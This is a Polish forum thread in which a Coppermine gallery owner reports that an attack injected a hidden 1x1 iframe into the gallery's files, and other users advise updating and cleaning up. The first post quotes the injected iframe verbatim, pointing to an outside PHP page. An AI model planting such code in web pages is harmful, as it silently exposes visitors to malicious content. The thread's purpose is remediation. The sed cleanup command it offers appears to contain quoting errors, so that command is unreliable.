Coppermine hacked

[rene]

Witam

18 kwietnia całkiem spora ilość galerii Coppermine została zhakowana. Objawia się to generalnie tym że zmienia atrybuty galerii co początkowo uniemożliwia wejście na nią (777 na 775), zmienia ustawienia i wygląd galerii, ale co gorsza - wpieprza w kod taką linijkę:

<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>

Podejrzewam że zabawa będzie polegać na usunięciu tego syfu ręcznie, większym problemem jest jednak namierzenie w których plikach konkretnie znajduje się ten kod. Rozpoznać to można dosyć łatwo - po otwarciu galerii w różnych miejscach, zazwyczaj w narożniku, znajduje się malutki kwadracik.

Miał ktoś już ten problem? Wie ktoś jak się tego pozbyć?

[Misiaque]

Myślę, że zabawa to będzie polegać na tym, by zamknąć furtkę którą się to stało

[Kolaj]

Która miałeś wersję Coppermine? Całkiem niedawno ukazała się 1.4.18, która łata jakieś dziury.

[rene]

1.4.5

O tej nowej wiem, problem jest taki że nowa wersja łata dziury i zabezpiecza przed ponownym hakowaniem, ale stary syf trzeba usunąć samemu.

Wyczyściłem plik index.php, ale nie pomogło, zaszyte jest to też w innych plikach, i w tym szkopuł. Na razie próbuję zassać Allias Find and Replace, ale może ktoś mnie uprzedzi i wie jak sobie z tym dziadostwem poradzić?

[Kolaj]

O, kolego, to ja widzę, że Ty się sam o to prosiłeś. Od publikacji 1.4.5 upłynęły dwa lata, wykryto mnóstwo błędów i wypuszczono wiele aktualizacji. Aktualizować trzeba na bieżąco.

Natomiast, teraz, to zamiast bawić się w takie wyszukiwanie i usuwanie, po prostu zaktualizuj do bieżącej wersji. Aktualizacja polega na nadgraniu prawie wszystkich plików i wywołaniu update.php, który aktualizuje strukturę bazy danych. Powinno pomóc.

Aha, nie zapomnij wykonać wcześniej backup bazy i plików.

EDIT: Procedura aktualizacji z wersji 1.4.x:
http://coppermine-gallery.net/demo/c...s/index.htm#14

[rene]

A jak to ma się do bieżących ustawień galerii? Czy po takim update muszę ponownie ustawiać wszystko wedle mojego "widzimisię", czy taka aktualizacja nie ingeruje w wygląd ani ustawienia użytkownika?

A z tymi 2 latami to fakt, bo mniej więcej od tego okresu mam tą galerie

[Kolaj]

A jak to ma się do bieżących ustawień galerii? Czy po takim update muszę ponownie ustawiać wszystko wedle mojego "widzimisię", czy taka aktualizacja nie ingeruje w wygląd ani ustawienia użytkownika?

Jak zrobisz zgodnie z procedurą, to nic się nie uszkodzi i ustawienia zostaną zachowane. A jeśli nawet, to przecież masz backup, który zrobisz tuż przed aktualizacją.

A z tymi 2 latami to fakt, bo mniej więcej od tego okresu mam tą galerie

No, to masz nauczkę na przyszłość.

[rene]

Backup to właśnie robię, obawiam się że przy szybkości mojego łącza potrwa to kilka ładnych godzin, i to jest największy ból tego wszystkiego.

No nic, mam nadzieję że plewienie chwastów odbędzie się w miarę bezboleśnie.

Pochwalę się jak będzie po wszystkim.

A co do nauczki - większość aplikacji przyzwyczaiła mnie do tego wygodnego wyskakującego raz na jakiś czas okienka: czy chcesz zainstalować aktualizację? I ot - cała historia

Dzięki Kolaj!

[Peri Noid]

Jeśli masz tam dostęp shell-owy (jakiś Unix/Linux/BSD) to możesz wspomóc się sed'em. Jeśli dodany napis jest zawsze taki sam, to możesz na drzewku z plikami zapuścić coś takiego:

Kod:

find -type f -exec sed -i "s/<iframe src='http:\/\/ccfelomvhk.com\/d\l/adv542.php' width=1 height=1><\/iframe>//g'" '{}' \;

To powinno wyciąć wszystkie powtórzenia tego tekstu. Oczywiście, lepiej najpierw zrobic sobie backup ;-)

[Kolaj]

Ale po co robić takie hece, skoro i tak następnym krokiem powinien być update do aktualnej wersji, który, jak wcześniej wspomniałem, nadgrywa wszystkie pliki oprócz konfiguracyjnych i folderu albums, w którym leżą wyłącznie nasze kochane jpg-i?